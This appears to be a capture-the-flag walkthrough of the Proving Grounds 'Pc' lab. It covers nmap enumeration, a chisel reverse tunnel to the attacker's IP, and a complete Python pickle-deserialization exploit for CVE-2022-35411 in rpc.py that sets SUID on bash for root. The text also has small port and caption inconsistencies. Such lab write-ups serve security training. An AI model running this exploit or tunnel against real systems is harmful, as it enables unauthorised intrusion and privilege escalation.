PG - Pc

PG – Pc

In this walk through, we will be going through the Pc room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of getting initial access by accessing a browser terminal on port 8000 and for privilege escalation, exploitation of rpc.py via CVE-2022-35411 is required to get root on the target. So, let’s get started without any delay.

Pc

Machine Info:

TitlePc
IPaddress192.168.169.210
DifficultyIntermediate
OSLinux
DescriptionPc is an Intermediate Linux machine which requires getting initial access by accessing a browser terminal on port 8000 and for privilege escalation, exploitation of rpc.py via CVE-2022-35411 is required to get root on the target.

Enumeration:

  • I started off with my regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 80 (HTTP).

$ sudo nmap -A 192.168.169.210

Nmap scan report for 192.168.169.210
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE  VERSION
22/tcp   open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2020-12062	5.0	https://vulners.com/prion/PRION:CVE-2020-12062
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp   filtered domain
8000/tcp open     http-alt ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|     <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>404</h1></body></html>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 677047
|     <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>ttyd - Terminal</title><link rel="icon" type="image/png" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb
|   Socks5, X11Probe: 
|     HTTP/1.0 403 Forbidden
|     server: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|     content-type: text/html
|     content-length: 173
|_    <html><head><meta charset=utf-8 http-equiv="Content-Language" content="en"/><link rel="stylesheet" type="text/css" href="/error.css"/></head><body><h1>403</h1></body></html>
|_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0)
|_http-title: ttyd - Terminal
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=2/5%Time=65C0FF6B%P=x86_64-pc-linux-gnu%r(Get
SF:Request,1AFA,"HTTP/1\.0\x20200\x20OK\r\nserver:\x20ttyd/1\.7\.3-a2312cb
SF:\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent-
SF:length:\x20677047\r\n\r\n<!DOCTYPE\x20html><html\x20lang=\"en\"><head><
SF:meta\x20charset=\"UTF-8\"><meta\x20http-equiv=\"X-UA-Compatible\"\x20co
SF:ntent=\"IE=edge,chrome=1\"><title>ttyd\x20-\x20Terminal</title><link\x2
SF:0rel=\"icon\"\x20type=\"image/png\"\x20href=\"data:image/png;base64,iVB
SF:ORw0KGgoAAAANSUhEUgAAACAAAAAcCAYAAAAAwr0iAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS
SF:BJbWFnZVJlYWR5ccllPAAAA0xpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tld
SF:CBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8\+IDx4OnhtcG1
SF:ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlID
SF:UuNi1jMDY3IDc5LjE1Nzc0NywgMjAxNS8wMy8zMC0yMzo0MDo0MiAgICAgICAgIj4gPHJkZ
SF:jpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50
SF:YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh
SF:0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vb"
SF:)%r(X11Probe,127,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/1\.7
SF:\.3-a2312cb\x20\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\
SF:r\ncontent-length:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8\x20
SF:http-equiv=\"Content-Language\"\x20content=\"en\"/><link\x20rel=\"style
SF:sheet\"\x20type=\"text/css\"\x20href=\"/error\.css\"/></head><body><h1>
SF:403</h1></body></html>")%r(FourOhFourRequest,127,"HTTP/1\.0\x20404\x20N
SF:ot\x20Found\r\nserver:\x20ttyd/1\.7\.3-a2312cb\x20\(libwebsockets/3\.2\
SF:.0\)\r\ncontent-type:\x20text/html\r\ncontent-length:\x20173\r\n\r\n<ht
SF:ml><head><meta\x20charset=utf-8\x20http-equiv=\"Content-Language\"\x20c
SF:ontent=\"en\"/><link\x20rel=\"stylesheet\"\x20type=\"text/css\"\x20href
SF:=\"/error\.css\"/></head><body><h1>404</h1></body></html>")%r(Socks5,12
SF:7,"HTTP/1\.0\x20403\x20Forbidden\r\nserver:\x20ttyd/1\.7\.3-a2312cb\x20
SF:\(libwebsockets/3\.2\.0\)\r\ncontent-type:\x20text/html\r\ncontent-leng
SF:th:\x20173\r\n\r\n<html><head><meta\x20charset=utf-8\x20http-equiv=\"Co
SF:ntent-Language\"\x20content=\"en\"/><link\x20rel=\"stylesheet\"\x20type
SF:=\"text/css\"\x20href=\"/error\.css\"/></head><body><h1>403</h1></body>
SF:</html>");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/5%OT=22%CT=1%CU=37735%PV=Y%DS=4%DC=T%G=Y%TM=65C0FFAB
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=FC%TI=Z%II=I%TS=A)SEQ(SP=FA%G
OS:CD=1%ISR=FD%TI=Z%TS=C)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%
OS:O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4
OS:=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R
OS:=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=81CD%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT       ADDRESS
1   255.30 ms 192.168.45.1
2   255.26 ms 192.168.45.254
3   255.84 ms 192.168.251.1
4   256.04 ms 192.168.169.210

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.69 seconds

nmap scan

port 8000 open

  • Enumerated the web server on port 80 and found a web browser command shell. Nice!

terminal access via browser

  • Fired gobuster on the target to reveal some hidden directories but found nothing worth exploring.

gobuster dir -u http://192.168.169.210:8000/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

Initial Access:

  • Next, upgraded the browser shell to a full-blown TTY reverse shell.

got initial access

Privilege Escalation:

  • Executed LinPEAS on the target to enumerate some privilege escalation vectors. Found out that a service is running on port 65432 on target localhost.

Active Ports

  • Performed a port forwarding setup to forward the traffic from the target localhost port 65432 to my local port 65432.

# Attacker machine

./chisel server --reverse --port 9000

# Victim machine

./chisel client 192.168.45.164:9000 R:65432:127.0.0.1:65432

chisel attacker server

chiel client server

  • Performed a nmap scan on the target port, seems like a HTTP service running but got nothing useful.

$ sudo nmap -A -p 65432 127.0.0.1
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-05 21:53 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000079s latency).

PORT      STATE SERVICE VERSION
65432/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Kerberos, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     content-type: text/plain; charset=utf-8
|     Connection: close
|     Invalid HTTP request received.
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Mon, 05 Feb 2024 16:23:35 GMT
|     server: uvicorn
|     content-type: text/plain; charset=utf-8
|_    Connection: close
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port65432-TCP:V=7.80%I=7%D=2/5%Time=65C10B87%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20H
SF:TTP\x20request\x20received\.")%r(GetRequest,95,"HTTP/1\.1\x20405\x20Met
SF:hod\x20Not\x20Allowed\r\ndate:\x20Mon,\x2005\x20Feb\x202024\x2016:23:35
SF:\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text/plain;\x20charse
SF:t=utf-8\r\nConnection:\x20close\r\n\r\n")%r(HTTPOptions,95,"HTTP/1\.1\x
SF:20405\x20Method\x20Not\x20Allowed\r\ndate:\x20Mon,\x2005\x20Feb\x202024
SF:\x2016:23:35\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,76,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20HTTP\x20request
SF:\x20received\.")%r(DNSVersionBindReqTCP,76,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nConnection:
SF:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\.")%r(DNSStatus
SF:RequestTCP,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\x20H
SF:TTP\x20request\x20received\.")%r(SSLSessionReq,76,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\.")%r(Te
SF:rminalServerCookie,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInva
SF:lid\x20HTTP\x20request\x20received\.")%r(TLSSessionReq,76,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8
SF:\r\nConnection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\
SF:.")%r(Kerberos,76,"HTTP/1\.1\x20400\x20Bad\x20Request\r\ncontent-type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\nInvalid\
SF:x20HTTP\x20request\x20received\.")%r(SMBProgNeg,76,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\ncontent-type:\x20text/plain;\x20charset=utf-8\r\nCon
SF:nection:\x20close\r\n\r\nInvalid\x20HTTP\x20request\x20received\.");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.28 seconds

port 65432

  • At this point, i was looking for other privilege escalation vectors. On looking closely at the running processes list, found out that a python script rpc.py is running as root.

rpc.py

  • Peeked into the python script reveals that it is running on port 65432.

cat rpy.py

CVE-2022–35411

  • Looked online for any known exploits related to rpc.py and found a RCE.

Exploit: https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py

CVE-2022–35411

  • Changed the payload in the exploit script. The complete script is given below where we will execute the bash binary by setting the SUID bit which in return give us a shell back as root.

adding reverse shell one-liner

import requests
import pickle

HOST = "127.0.0.1:65432"
URL = f"http://{HOST}/sayhi"
HEADERS ={
    "serializer": "pickle"
}

def generate_payload(cmd):
    class PickleRce(object):
        def __reduce__(self):
            import os
            return os.system, (cmd,)
    payload = pickle.dumps(PickleRce())
    print(payload)
    return payload

def exec_command(cmd):
    payload = generate_payload(cmd)
    requests.post(url=URL, data=payload, headers=HEADERS)

def main():
    exec_command('id;chmod u+s /bin/bash')

if __name__ == "__main__":
	main()

  • Got the root shell. Captured the flag and marked the machine as complete.

user@pc:/home/user$ python3 expl.py 
b'x80x04x951x00x00x00x00x00x00x00x8cx05posixx94x8cx06systemx94x93x94x8cx16id;chmod u+s /bin/bashx94x85x94Rx94.'
user@pc:/home/user$ ls -alh /bin/bash
-rwsr-xr-x 1 root root 1.2M Apr 18  2022 /bin/bash
user@pc:/home/user$ /bin/bash -p -i 
bash-5.0# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
bash-5.0#

Also Read: PG – Marshalled

Conclusion:

Conclusion

So that was “Pc” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 8000 (HTTP). Enumerated the web server on port 8000 and found a terminal access via browser. Used the same to get initial access on the target. For privilege escalation, exploitation of rpc.py via CVE-2022-35411 to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top